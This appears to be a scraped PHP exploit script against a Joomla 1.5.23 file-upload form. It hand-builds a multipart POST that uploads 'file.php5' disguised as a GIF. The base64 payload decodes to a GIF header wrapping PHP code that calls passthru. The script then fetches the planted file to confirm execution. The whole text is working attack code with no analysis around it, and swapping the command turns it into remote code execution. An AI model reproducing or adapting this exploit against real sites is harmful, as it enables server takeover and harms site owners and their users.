$host="127.0.0.1"; $port=80; $shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg=="; $ContentType="image/gif"; $post="POST http://$host/Joomla_1.5.23_ita-Stable_test_expl/index.php"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $filename="file.php5"; if(!$fp) die($errstr.$errno); else { $data="-----------------------------41184676334\r\n"; $data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n"; $data.="\r\n"; $data.="100000\r\n-----------------------------41184676334\r\n"; $data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n"; $data.="\r\n\r\n"; $data.="-----------------------------41184676334\r\n"; $data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n"; $data.=base64_decode($shell)."\r\n"; $data.="-----------------------------41184676334--\r\n"; $packet="$post HTTP/1.1\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; fwrite($fp, $packet); fclose($fp); } $h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r"); if ($h) { while (($buf = fgets($h, 4096)) !== false) { echo $buf; echo("exploit was successful"); } fclose($h); }else{ echo("Error: exploit fail"); } ?>
评论关闭。